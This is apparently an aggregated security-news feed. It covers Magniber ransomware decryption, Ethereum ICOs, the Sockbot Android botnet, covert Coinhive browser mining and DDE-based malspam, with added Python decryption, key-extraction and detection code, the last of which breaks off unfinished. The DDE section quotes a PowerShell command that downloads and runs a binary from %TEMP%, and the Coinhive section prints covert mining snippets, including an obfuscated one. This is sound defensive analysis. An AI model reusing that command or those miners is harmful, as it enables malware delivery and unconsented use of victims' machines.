First, the crypto context is initialized. The malware imports the key and initialization vector with the help of functions CryptImportKey, CryptSetKeyParam:

Encrypting the file:

The first write stores the 16-byte long string at the beginning of the file. Then, the file is read chunk by chunk and encrypted using Windows Crypto API.
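Two things above are worth having in code: the key-selection rule (the first 16-byte C2 reply wins, otherwise the per-sample hardcoded key) and the on-disk format (16-byte marker that doubles as the IV, then AES-128-CBC ciphertext). A victim whose key download failed, for instance from a non-Korean IP, was encrypted with the hardcoded key, so recording it per sample matters. The Python below is an added example, not Malwarebytes' code: a pure-Python AES-128-CBC decryptor (no third-party dependency) plus those two functions. Assumptions not stated on the page: PKCS#7 padding at the end of the file (the CryptoAPI default for block ciphers), and that the key and IV are the ASCII strings shown. The C2 replies in the test are constructed.

```python
# Added example: key selection and file decryption as described for the sample.
SAMPLE_KEY = b"S25943n9Gt099y4K"   # hardcoded fallback key of the analyzed sample
SAMPLE_IV = b"EP866p5M93wDS513"    # hardcoded IV, also written as the file marker


def _gmul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    p = 0
    for _ in range(8):
        if b & 1:
            p ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return p


def _build_sbox():
    """S-box computed from the definition (inverse in GF(2^8) + affine map)."""
    sbox = [0] * 256
    for x in range(256):
        inv, base, e = (1 if x else 0), x, 254      # x^254 == x^-1 for x != 0
        while x and e:
            if e & 1:
                inv = _gmul(inv, base)
            base = _gmul(base, base)
            e >>= 1
        s = inv
        for i in range(1, 5):
            s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
        sbox[x] = s ^ 0x63
    return sbox


SBOX = _build_sbox()
INV_SBOX = [0] * 256
for _i, _v in enumerate(SBOX):
    INV_SBOX[_v] = _i


def _expand_key(key):
    """AES-128 key schedule: 11 round keys of 16 bytes each."""
    w = [list(key[4 * i:4 * i + 4]) for i in range(4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]       # RotWord + SubWord
            t[0] ^= rcon
            rcon = _gmul(rcon, 2)
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def _inv_shift_rows(s):   # state is column-major: byte r + 4*c is row r, col c
    return [s[r + 4 * ((c - r) % 4)] for c in range(4) for r in range(4)]


def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
                _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
                _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
                _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14)]
    return out


def aes128_decrypt_block(key, block):
    """FIPS-197 inverse cipher for one 16-byte block."""
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[10])]
    for rnd in range(9, 0, -1):
        s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
        s = _inv_mix_columns([b ^ k for b, k in zip(s, rk[rnd])])
    s = [INV_SBOX[b] for b in _inv_shift_rows(s)]
    return bytes(b ^ k for b, k in zip(s, rk[0]))


def aes128_cbc_decrypt(key, iv, ct):
    if len(ct) % 16:
        raise ValueError("ciphertext length is not a multiple of 16")
    out, prev = bytearray(), iv
    for i in range(0, len(ct), 16):
        blk = ct[i:i + 16]
        out += bytes(p ^ c for p, c in zip(aes128_decrypt_block(key, blk), prev))
        prev = blk
    return bytes(out)


def select_key(responses, fallback):
    """The sample's rule: first 16-byte C2 reply is the key, else the hardcoded one."""
    for r in responses:
        if r is not None and len(r) == 16:
            return r
    return fallback


def decrypt_magniber_file(blob, key):
    """Split marker (== IV) from ciphertext, decrypt, strip PKCS#7 if present."""
    marker, body = blob[:16], blob[16:]
    pt = aes128_cbc_decrypt(key, marker, body)
    n = pt[-1] if pt else 0
    if 1 <= n <= 16 and pt.endswith(bytes([n]) * n):   # padding is assumed
        pt = pt[:-n]
    return marker, pt
```

Because the marker is the IV and the IV is fixed per sample, the first 16 bytes of any encrypted file identify which build encrypted it; match them against the IV you recovered from the dropper before trying that build's hardcoded key. The pure-Python AES is slow (tens of kilobytes per second) and is here only to keep the example dependency-free; for bulk recovery swap `aes128_cbc_decrypt` for a library implementation.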


Magniber ransomware is being distributed instead of Cerber from the same exploit kit, to the same targets. Internally, however, it has nothing in common with Cerber and is much simpler. The only feature that makes it unique is how picky it is about the targeted country: for the first time, we are seeing country checks performed at several stages of execution.

This ransomware family appeared recently and probably is still under active development. We will keep an eye on its evolution and keep you informed.

The users of Malwarebytes for Windows (with real-time, anti-ransomware technology deployed) are protected against Magniber.


The post Magniber ransomware: exclusively for South Koreans appeared first on Malwarebytes Labs.

Go to Source
Author: hasherezade

Explainer: Smart contracts, Ethereum, ICO

Investing in cryptocurrency-funded projects is as hot as ever, and the almost complete absence of success hasn’t seemed to dim investors’ hopes one bit. In 2017, with more than a full quarter still to go, various project ICOs (that’s initial coin offerings) have already raised about $1.7 billion.

There aren’t too many successful projects to speak of, but investors remain optimistic, and cryptocurrencies like Ethereum may help explain why.

TOP-5 cryptocurrency capitalization and prices. Source

As you can see from the capitalization table above, Ethereum is a distant second to Bitcoin but miles ahead of other altcoins. In June 2017, the upstart almost overtook the mighty Bitcoin. What makes Ethereum so special, and why is it at the heart of the vast majority of ICOs this year?

The idea of Ethereum

From a user’s point of view, Bitcoin is nothing more than a payment system: Users transfer money to one another, and that’s about it. Ethereum goes beyond the simple payment-system framework, giving users the ability to write wallet-based programs.

These programs can receive money from wallets automatically, decide how much to send and where, and so forth — with one important condition: Each program operates the same for all users. The programs act according to known principles that are predictable, equal, transparent, and unmodifiable. Ethereum wallets come in two types: those managed by people and those run autonomously by programs.

The programs, also known as smart contracts, are written to the blockchain. Thus, a contract is stored forever, all users have a copy of it, and it is executed equally for every network participant that deals with it.

This innovation has significantly expanded blockchain currencies’ scope of application.

Examples of smart contracts

What programs can be written? Any you like. Take, for example, a financial pyramid. A pyramid’s smart contract might use the following rules:

  1. If sum x arrives from the address of wallet A, log it.
  2. If after that, sum y > 2x arrives from address B, send 2x money to address A, and log the debt to participant B.

And so on for each user and transaction that follows. Optionally, a rule could send 5% of all incoming money to the author of the smart contract.

Or how about an auction?

  1. If the auction is not over, log the addresses and bidding amounts of each participant.
  2. When the auction is over, select the maximum bid, announce the winner, and return all other bids.

Endless combinations of other entities and applications are possible: wallets with multiple owners, financial instruments, self-placing bets, polls, lotteries, games, casinos, notaries, and more.

Because of the blockchain, everyone can be sure that no one is cheating; everyone sees the program’s code and can track it working exactly as written. It will not make off with anyone’s money or go bankrupt (assuming, of course, there are no bugs or gremlins in the code).

Limitations of smart contracts

The smart contracts do, however, have significant limitations. Here are some of them:

  1. It’s very difficult to produce random numbers in a blockchain-based program, which affects lotteries.
  2. It’s not easy to hide certain information in a blockchain — for example, auction participants or their bids. Blockchain was designed for transparency, and sometimes that turns into a disadvantage.
  3. If the contract requires information that is missing in the blockchain (e.g., the current exchange rate of a particular currency), then you have to trust a person who is adding this information to the blockchain.
  4. To interact with the contracts, users need ethers — the internal currency of Ethereum. Users without ether in a wallet cannot take part in polls or any other Ethereum-based activities.
  5. Smart contracts work slowly. About 3 to 5 transactions per second can be performed worldwide — in total, not per participant.
  6. Any error in a smart contract stays forever. The only way to fix an error is to switch to another smart contract. However, this option must be included in the initial program, which is rarely the case.
  7. Smart contracts can freeze or fail to work as expected because program code can be difficult to understand, so writers may make critical errors — and users may not be able to tell what the code will actually do.

A simple Ethereum smart contract. Can you see the error that makes it possible to steal all of the money? Neither would most people.

Ultimately, much depends on the capabilities of smart contracts’ authors.

The main use of smart contracts

Pyramids, polls, casinos, lotteries — what’s not to like? But what smart contracts have really facilitated is IPO-style fundraising.

First of all, a smart contract lets you automate accounting. The contract logs how much money comes in and from whom, computes and distributes “shares,” and enables each participant to transfer and sell those shares.

Second, there’s no need to mess around with e-mail addresses, credit cards, card verification, investor authorization, and the like.

Finally, everyone can see how many shares were issued and how they were distributed among participants. The blockchain protects participants from project owners issuing additional shares secretly or someone selling one share multiple times to different people.

ICO — initial coin offering

As of January 1, 2017, one ether was worth $8, and the value peaked (for now, at least) at $400 by June. Gains were thanks to the large number of ICOs held as the initial offering of shares in startups. The desire to speculate in projects stimulated demand for the cryptocurrency — in this case, Ethereum. And such projects are now legion.

Ethereum price chart. Source

The typical cryptostartup follows this pattern:

  1. You have an idea, typically something cryptocurrency or blockchain related.
  2. You need money to get things off the ground.
  3. You announce to the public that you’re accepting ethers in exchange for shares (or tokens or whatever) under a smart contract.
  4. You advertise your project and raise the required sum.

The amount raised is usually $10 to $20 million, and it takes somewhere from a few minutes to a few days to collect. Typically, the ICO is limited in terms of time or amount raised, which causes a feeding frenzy.

Sometimes the frenzy reaches comic proportions. For example, one project ICO raised $35 million in 24 seconds. To get their fingers in the pie, project diehards paid up to $6,600 commission per transaction; the high demand for Ethereum combined with its low throughput hiked commission fees.

Crypto-investment payback

What happens next with tokens issued to investors depends on the project. Someone might promise to pay dividends on future profits; someone else might plan to accept the tokens as payment for project-related services. Another entrepreneur might promise nothing at all, like the Useless Ethereum Token’s creator did, explicitly declaring that nobody gets anything in return and raising about $100,000 nevertheless.

Generally speaking, the tokens find their way onto a crypto stock exchange, where they are traded. Those who missed out on the ICO can buy them there, usually at a markup. Those who took part in the ICO in hopes of reselling at a profit can offload them on the exchange, where the regular economics of supply and demand apply (despite there being no product). One difference, however, is that no regulators exist in the crypto-industry, so shady means of inflating prices run rampant.

As I said at the beginning, there seems to be no more reason to jump into the ICO trend than any other get-rich-quick scheme — but now you understand some of the tech wizardry behind the excitement.

Go to Source
Author: Alexey Malanov

Android malware on Google Play adds devices to botnet and performs DDoS attacks

We have encountered a new and highly prevalent type of Android malware (detected as Android.Sockbot) posing as apps on Google Play and later adding compromised devices into a botnet. So far we have identified at least eight such apps, with an install base ranging from 600,000 to 2.6 million devices. This malware appears to primarily target users in the United States, but it also has a presence in Russia, Ukraine, Brazil, and Germany.


Figure. One of the malicious apps posing as a skin app for Minecraft PE

The legitimate purpose of the apps is to modify the look of the characters in Minecraft: Pocket Edition (PE). In the background, sophisticated and well-disguised attacking functionality is enabled. We set up network analysis of this malware in action and observed activity apparently aimed at generating illegitimate ad revenue.

The app connects to a command and control (C&C) server on port 9001 to receive commands. The C&C server requests that the app open a socket using SOCKS and wait for a connection from a specified IP address on a specified port. A connection arrives from the specified IP address on the specified port, and a command to connect to a target server is issued. The app connects to the requested target server and receives a list of ads and associated metadata (ad type, screen size name). Using this same SOCKS proxy mechanism, the app is commanded to connect to an ad server and launch ad requests.

There is no functionality within the application to display ads.

This highly flexible proxy topology could easily be extended to take advantage of a number of network-based vulnerabilities, and could potentially span security boundaries. In addition to enabling arbitrary network attacks, the large footprint of this infection could also be leveraged to mount a distributed denial of service (DDoS) attack.

There is a single developer account named FunBaster associated with this campaign. The malicious code is obfuscated and key strings are encrypted, thwarting base-level forms of detection. Additionally, the developer signs each app with a different developer key, which helps to avoid static analysis-based heuristics as well.

We notified Google Play of the presence of these malicious apps on October 6 and Google has confirmed these have been removed from the store.



Symantec recommends mobile users observe the following security best practices:

  • Keep your software up to date.
  • Refrain from downloading apps from unfamiliar sites.
  • Only install apps from trusted sources.
  • Pay close attention to the permissions requested by an app.
  • Install a suitable mobile security app, such as Norton Mobile Security, in order to protect your device and data.
  • Make frequent backups of important data.

Powered by WPeMatico

Unauthorized Coin Mining in the Browser

Cryptocurrencies have taken the world by storm, from the biggest player, Bitcoin, to newcomers such as Monero and Ethereum. Cryptocurrency mining has thus become a hot industry, from powerful, dedicated mining hardware to exploiting graphics cards’ parallel computing power. Recently, browser coin mining has taken off, for a lot of different reasons. Although the computing power (per instance) is much less than that of dedicated hardware, being able to exploit many users on various sites more than makes up for it. There has already been quite some media coverage of this, such as by the BBC and Malwarebytes. While we do not consider cryptocurrency mining inside browsers malicious by itself, it is the fact that such mining often goes on without the end user’s consent, or even knowledge, that makes this practice shady and despicable.

Coinhive, one of the more popular browser-mining services out there, offers site owners a piece of JavaScript for easy integration. Site owners exploit site visitors’ CPU time to mine XMR (Monero) for Coinhive, and Coinhive pays out 70% of the mined value to site owners. A new player, crypto-loot, emerged recently; it offers similar services but pays out 88% of revenue.

Coinhive Integration

On the official Coinhive homepage, we found detailed documentation on how to integrate the mining scripts into any given website. Owners can use the easy version:

var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');

or the more complicated version, which gives control over how the end user’s CPU time is used (e.g., how many threads to run and whether the mining should throttle):

var miner = new CoinHive.User('YOUR_SITE_KEY', 'john-doe', {
    threads: 4,         // number of mining threads to run
    autoThreads: false, // do not choose the thread count automatically
    throttle: 0.8,      // fraction of time the threads stay idle (0 = no throttling)
    forceASMJS: false   // allow WebAssembly rather than forcing asm.js
});

A higher thread count and/or a lower throttle value results in more CPU usage in the client’s browser. With a higher CPU occupation percentage, end users will likely experience sluggish behavior and a poor experience on the website.

Tracking Coinhive Integrations

We have been tracking the inclusion of the Coinhive mining script (coinhive.min.js) for a week in our PANDB unknown feed. The number of URLs leading to the download of such scripts is astounding. Since we started tracking, we have seen anywhere from 6K to over 10K unique URLs in a single day.

Overall, we have seen over 35,119 unique URLs associated with coinhive.min.js. Across these URLs, there are a total of 144 IPs and 1,025 hostnames. Based on our observation, the appearance of these scripts can be clearly divided into three categories – standalone, voluntary, and compromised.

Standalone Hosting

URLs like this one,


always belong to a gibberish[.]bid domain, with a long trailing set of parameters. Of the 35,119 URLs we collected, 33,188, or 94.5%, are of this category. In addition, there are 612 URLs leading to the same set of .bid domains but with much shorter paths, like hxxp://www.pudptxanhspld[.]bid/static/robots.txt, or even the domain itself: hxxp://www.pudptxanhspld[.]bid/. The fact that robots.txt hosts exactly the same content as the longer URLs with seemingly random parameters leads us to speculate that the domain serves the same coin-mining content to all visitors, ignoring the request parameters or paths. It is interesting to ask why our customers visited such weird, long, random URLs in the first place; we offer some speculation later in this blog.

After removing the .bid ones, we are left with 1,342 URLs, or 3.8% of the corpus. The remainder can be further categorized into the following three groups:

Voluntary: Crypto-mining related sites

We found multiple URLs related to coin/crypto/mining keywords. Some of these are forums discussing crypto-mining, while others introduce the concept. Regardless of the purpose of the websites, we did not find any evidence that such sites are asking for users’ consent to mine XMR.

Voluntary: Monetization

This category includes sites that obviously want to include coin-mining scripts to monetize their traffic. Examples include video/porn sites such as


While they do provide their normal service to visitors, browsing these sites does not pop up any sort of warning about the coin-mining behavior for the user.

What is more interesting is that, by searching across the whole URL corpus for coinhive.min.js downloads, we are able to find URLs such as


which include xmoviesforyou[.]com as part of the URL, almost like a referer parameter. We are able to verify that


is indeed a valid URL leading to a subpage in the porn site. That site does include coinhive.min.js, but at the time of our re-confirmation, the inclusion is directly from https://coinhive[.]com/lib/coinhive.min[.]js, and the whole page does not include any references to a suspicious .bid domain/URL. We speculate that the porn website URL may have included an iframe leading to the .bid domain, which then triggers the download of coinhive.min.js. However, this mechanism may have been later abandoned in favor of direct inclusion.

Compromised/Injected Integration

Another group of sites seem to have fallen victim to malicious script injection into their vulnerable servers. We found that www.livetruemoney[.]com uses up 100% of the user’s CPU time. Upon closer investigation, we found that this site is hosting multiple copies of coinhive.min.js, toward the top and bottom of the page. A similar situation occurs on www.comptesofficiels[.]com/, where the snippet is injected outside of the tag (a common symptom of injected content).

It is quite possible that crypto-mining has become a new injection vector in addition to traditional exploit kit redirections.

Finally, we have also seen some typo-squatting/phishing domains serving coinhive.min.js. Examples include analytics-google[.]net/track.php, and www-bank[.]ru.

Actor/Mining Configuration Analysis

According to our observation, coin mining integration scripts are rarely obfuscated, which means we can extract the anonymous ‘site key’ and its configuration easily. Per Coinhive’s documentation, the ‘site key’ is a unique identifier that indicates which beneficiary will be paid; therefore, the attacker has no incentive to garble this field. Here are some interesting stats about the actors and their configurations.

Actor distribution


There is a clear winner at the top – ID t3z562mp2zg1lia7rujy19d67woezmjj, accounting for 35,742 of the 36,842 IDs we were able to retrieve. Surprisingly, querying a website source code search engine such as publicWWW only returns 13 results (mostly .bid domains). The distant second and third scored 370 and 119 occurrences respectively, along with 8 other IDs exceeding 10 occurrences. A long tail of 146 IDs appear only once in our dataset; these are possibly category 2 or 3 in the integration scenarios described above – mining that benefits the site itself rather than a campaign owner.

Unsurprisingly, site key owner t3z562mp2zg1lia7rujy19d67woezmjj has all the .bid URLs pointing to this payee. In addition, there are URLs such as


also using the same site key. Passive DNS analysis reveals that this IP was actually mapped to serve.popads[.]net, so it is interesting that this particular advertising network may have led to crypto-mining behavior.

In this chart, a special case, sitekey, stands out. There are 151 sites using it; it is a variable predefined in earlier scripts (as opposed to a hardcoded string), so without dynamic analysis we are not able to retrieve its real content. We took a look at a few samples, and it seems that sites using the sitekey variable are more often than not serving the mining script to benefit themselves.

We found only six URLs out of the entire population making more than one call to the CoinHive.Anonymous function (which would mean they could have been compromised by two different adversaries or be serving two different payees at the same time). Upon closer inspection, all of the calls actually use the same site key, so in summary we did not find evidence of one site serving more than one beneficiary. We did, however, find that one site, lottoipros[.]com, is attempting to obfuscate its site key using simple Unicode encoding:

var _0x8cfd=["\x56\x63\x33\x38\x75\x32\x33\x35\x51\x67\x31\x55\x6E\x48\x78\x47\x43\x52\x6A\x59\x51\x4D\x58\x70\x6E\x4A\x73\x58\x77\x4B\x4C\x69","\x73\x74\x61\x72\x74"];var miner=new CoinHive.Anonymous(_0x8cfd[0],{threads:1,autoThreads:true,throttle:0.6,forceASMJS:false})

Clearly, the site owner/injector is aware of the risks of exposing its key and is trying to hide from public scrutiny. If this trend continues, it will become harder to use static analysis to detect crypto-mining sites.

Configuration Distribution

The dominant Actor ID t3z562mp2zg1lia7rujy19d67woezmjj uses the default configuration across all observed URLs, so we exclude this actor from this analysis to prevent skew. We also exclude the 142 sites that use a mineropts variable, which goes almost hand-in-hand with using the sitekey variable as the site key.

This left us with 827 valid data points. Among these, most sites only use 1 thread, by default; however, some sites use as many as 4 threads to maximize mining speed.

Thread count    Number of sites
default (1)     772
1               28
2               7
3               1
4               19

For throttling, other than the default setting, which disables throttling, the most popular option is to set it at 0.5, so that the CPU idles 50% of the time. Suffice it to say that most sites are not giving the user’s CPU any break at all, since they leave throttling disabled.

Throttle setting        Number of sites
default (0)             772
0.5                     28
0.2                     25
0.7                     19
0.9                     10
other values combined   35
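The site-key and configuration extraction used in the actor analysis and in the configuration distribution above, as an added example (not the post's own tooling): a small Python extractor that handles the three cases the text describes: a literal key, a key passed through a predefined variable such as sitekey (with options in mineropts), and a key hidden in a hex-escaped string array like the lottoipros[.]com sample. The regexes, the sample page sources and the keys in them are constructed for this example; the defaults of one thread and throttle 0 follow the tables above.

```python
import codecs
import re
from collections import Counter

# Sample page sources, constructed for this example after the three integration
# styles the post describes: a literal key with explicit options, a key passed
# through a predefined variable, and a key hidden in a hex-escaped string array
# (the array name _0x8cfd mirrors the lottoipros sample; the key is made up).
CONSTRUCTED_KEY = "EXAMPLEHEXKEYEXAMPLEHEXKEY000042"


def hex_escape(s):
    """Encode a string as JavaScript hex escapes (used only to build the sample)."""
    return "".join("\\x%02X" % ord(ch) for ch in s)


SAMPLE_PAGES = {
    "literal": """<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.User('EXAMPLEKEYEXAMPLEKEYEXAMPLEKEY12', 'john-doe', {
    threads: 4, autoThreads: false, throttle: 0.8, forceASMJS: false });
miner.start();</script>""",
    "variable": "<script>var miner = new CoinHive.Anonymous(sitekey, mineropts);</script>",
    "hexarray": 'var _0x8cfd=["%s","%s"];var miner=new CoinHive.Anonymous('
                '_0x8cfd[0],{threads:1,autoThreads:true,throttle:0.6,forceASMJS:false})'
                % (hex_escape(CONSTRUCTED_KEY), hex_escape("start")),
}

# new CoinHive.Anonymous(key[, options]) or new CoinHive.User(key, user[, options])
CALL_RE = re.compile(
    r"new\s+CoinHive\.(Anonymous|User)\s*\(\s*([^,)]+?)\s*"   # API and key expression
    r"(?:,\s*'[^']*'\s*)?"                                     # optional user name
    r"(?:,\s*(\{.*?\}|[A-Za-z_$][\w$]*)\s*)?\)",               # optional options
    re.S)
OPT_RE = re.compile(r"(\w+)\s*:\s*([\w.]+)")


def resolve_key(expr, source):
    """Turn the first argument of the CoinHive call into a site key where possible."""
    expr = expr.strip()
    if expr[0] in "'\"":
        return expr.strip("'\""), "literal"
    m = re.fullmatch(r"(_0x[0-9a-fA-F]+)\[(\d+)\]", expr)
    if m:  # index into a string array; decode the \xNN escapes of that element
        arr = re.search(r"var\s+%s\s*=\s*\[(.*?)\]" % re.escape(m.group(1)), source, re.S)
        if arr:
            items = [s.strip().strip("'\"") for s in arr.group(1).split(",")]
            return codecs.decode(items[int(m.group(2))], "unicode_escape"), "hex-escaped"
    return expr, "variable"  # e.g. sitekey: needs dynamic analysis to recover


def parse_options(opts):
    """Defaults as in the tables above: one thread and no throttling."""
    cfg = {"threads": 1, "throttle": 0.0, "autoThreads": False, "opts_source": "default"}
    if opts is None:
        return cfg
    if not opts.startswith("{"):
        cfg["opts_source"] = "variable"  # e.g. mineropts: contents unknown statically
        return cfg
    cfg["opts_source"] = "literal"
    for name, val in OPT_RE.findall(opts):
        if name == "threads":
            cfg["threads"] = int(val)
        elif name == "throttle":
            cfg["throttle"] = float(val)
        elif name == "autoThreads":
            cfg["autoThreads"] = val == "true"
    return cfg


def extract_miners(source):
    """Return one record per CoinHive constructor call found in a page source."""
    found = []
    for m in CALL_RE.finditer(source):
        key, key_source = resolve_key(m.group(2), source)
        cfg = parse_options(m.group(3))
        cfg.update(api=m.group(1), site_key=key, key_source=key_source)
        # Throttle 0 (the default) means the miner never lets the CPU idle.
        cfg["unthrottled"] = cfg["opts_source"] != "variable" and cfg["throttle"] == 0.0
        found.append(cfg)
    return found


def tally_site_keys(sources):
    """Actor distribution across many pages: how often each payee appears."""
    return Counter(r["site_key"] for src in sources for r in extract_miners(src))
```

Running tally_site_keys over a corpus of saved page sources reproduces the actor distribution; records whose key_source or opts_source is "variable" are the sitekey/mineropts cases that the post notes cannot be resolved without dynamic analysis.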

Hosting domain analysis

In this section, we show some hosting domain stats, including PassiveDNS and Whois data analysis.

The TLD distribution for domains hosting coinhive.min.js is shown below. For brevity, we aggregated all TLDs with fewer than 20 entries into an “others” category.


Clearly, the top suspects are .download and .bid domains, taking more than 35% of the total share of 1,025 domains. As expected, typically notorious TLDs like .xyz and .win are also listed.

Alexa rank distribution

We checked all associated domains against the current Alexa traffic ranking. The results are astonishing – there are 5 sites in the top 2K, 29 sites in the top 10K and 155 sites in the top 1 million. We sampled a few of the highest-ranking sites and show them here:

Site                  Alexa Rank
uptobox[.]com         771
123movies[.]co        963
cinecalidad[.]to      1026
watchfree[.]to        1892
sugklonistiko[.]gr    1910

At the time of the writing, we can no longer observe coinhive.min.js on their sites.

The highest ranked .bid domain, llxyyocfgfg[.]bid, is ranked at 3380 at the time of this writing. We have attached all these IOCs and their rankings at the end of this blog for the community’s benefit.

pDNS analysis

We looked up these domains in our passive DNS (pDNS) database. Of the 1026 domains in total, 794 were found with records. We found that the first DNS query to many domains dates back to the launch of our pDNS in 2013, for example uptobox[.]com, torrent[.]cd, and tiexue[.]net. This means these websites have been active for a long time, and some of them are quite popular based on their Alexa ranking, so the potential impact of Coinhive can be high in both duration and reach. We also found that the first DNS query to 502 (63%) of the domains happened in October 2017. Based on the figure below, we can clearly see the emerging trend of these domains.


We further investigated the DNS query pattern of these domains. In particular, the following graph shows the number of DNS queries to these websites per hour. Interestingly, we found that some domains exhibit very similar patterns. Although the start time and amount of traffic differ slightly, the overall shape of the traffic is very similar. This is another indicator that these domains potentially belong to the same campaign launched by the same owner.


In addition, we analyzed the distribution of IPs to which these domains resolved. We identified 1,172 IPs in total, located in 47 different countries, with the majority being in the US. The figure below shows the country-level distribution of these IPs.


Whois analysis

By querying public Whois servers as well as Domaintools, we obtained 861 valid Whois records for the 1,025 domains. We break the results down by registrant/email and registration date.

  • Registrant/Emails: Not much can be learned, because most (521) are privacy protected by WhoisGuard. Among the remaining registrants there are also fake ones such as “Administrator” and “Private Person.” After removing the useless entries, we are left with only 80 different registrants, with no more than one registrant appearing more than 3 times. All the .bid domains are privacy protected. Since the WhoisGuard service is not free (around $3/year), the .bid campaign actors are probably earning enough profit to offset this cost.
  • Registration date: To better present the details of registration dates, we separate domains by TLD:


For the .bid domains for which we were able to retrieve Whois information, most were registered after 10/01/2017, but spanning multiple days, showing that the campaign is very recent and that it rotates through a fresh set of domains every day.


By contrast, most .download domains were registered within the 3 days of 09/14-09/16, 2017, with only a handful added later. This looks to be a different campaign from the .bid one. A similar registration trend can be found in .review domains (87 out of 103 were registered on the 3rd, 7th, and 8th of October 2017).


Finally, after we exclude the suspected campaign domains (.bid, .download, .review, .top, .win), the registration dates are extremely spread out, from as early as 2001 to the current date. These domains are most likely either embracing the new crypto-mining monetization fever, or compromised by attackers to take advantage of their established reputation and high-volume visitors.

Victim analysis

The URLs we crawled to detect crypto-miner presence come from our PANDB cloud log. In this section, we analyze the demographics of visitors to such sites to shed some light on their real-world impact.


This figure shows the general geographic distribution of visitors to crypto-mining sites. While the US clearly dominates in total visit counts, Europe and Asia Pacific are not too far behind. This graph indicates a broad spectrum of victims all across the globe.

After breaking down visits site by site, we found that the most visited sites more or less align with their Alexa ranking, with over 40K visits* to 123movies[.]co:


* We only log a query when a customer using a given device visits the site for the first time within a TTL window; duplicate visits to the same site within a short timeframe are not counted. Therefore, the visit estimates are a lower bound.


As AdGuard has pointed out, the use of Coinhive or similar mining services is not itself malicious; it is how they are used that makes the sites malicious. Unfortunately, none of the sites we observed engaging in crypto-mining prompted the user with any sort of warning, let alone provided a kill switch for the mining. With Bitcoin soaring over $5K (at the time of writing), we can only expect more such services to spring up everywhere. To protect yourself from this fast-growing threat, we recommend two options:

  • Palo Alto Networks is blocking URLs hosting the Coinhive JavaScript files through PANDB, as these scripts are consuming system resources without the users’ knowledge or consent.
  • In addition, popular browser plugins such as Adblock Plus or Adguard will also block such mining scripts. Combined with our firewall solution, you can rest assured that your precious CPU time and electricity are not exploited by sneaky scripts.
  • Users interested in Domains hosting Coinhive script files included in this analysis can access them here.

The post Unauthorized Coin Mining in the Browser appeared first on Palo Alto Networks Blog.

Go to Source
Author: Yuchen Zhou


Old MS Office feature weaponized in malspam attacks

There has been a lot of talk recently, following a write-up and proof of concept, about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time; it allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby-trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers, but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

At first, DDE was used in some targeted attacks. However, it has now become mainstream with the group behind Hancitor (spotted by @James_inthe_box, with the DDE usage identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a YARA rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\Windows\System32\cmd.exe " /k powershell.exe (New-Object System.Net.
'%TEMP%\tvs.exe');Start-Process '%TEMP%\tvs.exe'"

The rest of the attack is straightforward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.
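One way to detect a DDE field whose instruction text has been split, as an added example rather than the YARA rule mentioned above: instead of matching the raw XML as a string, join the <w:instrText> runs of each field (between its begin and end fldChar markers) and only then check whether the instruction starts with DDE or DDEAUTO. The document.xml fragment below is constructed for this example, the command in it is a placeholder path rather than anything from the campaign, and an ordinary DATE field is included to show that not every field is flagged.

```python
import re
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Constructed word/document.xml fragment. The first field's code is split across
# several <w:instrText> runs, the evasion the post describes; the second field is
# a normal DATE field.
SAMPLE_DOCUMENT_XML = r"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> Dd</w:instrText></w:r>
  <w:r><w:instrText xml:space="preserve">E</w:instrText></w:r>
  <w:r><w:instrText xml:space="preserve"> "c:\placeholder\app.exe" "placeholder-args" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="separate"/></w:r>
  <w:r><w:t>Click to update this field</w:t></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
<w:p>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText xml:space="preserve"> DATE \@ "d MMMM yyyy" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
</w:body>
</w:document>"""

DDE_RE = re.compile(r"^\s*(?:DDEAUTO|DDE)\b", re.I)


def naive_string_scan(document_xml):
    """A plain substring check over the raw XML, which the split runs defeat."""
    return re.search(r"DDEAUTO|DDE", document_xml, re.I) is not None


def extract_field_codes(document_xml):
    """Re-join each field's instruction text across all of its <w:instrText> runs."""
    root = ET.fromstring(document_xml)
    fields, open_fields = [], []
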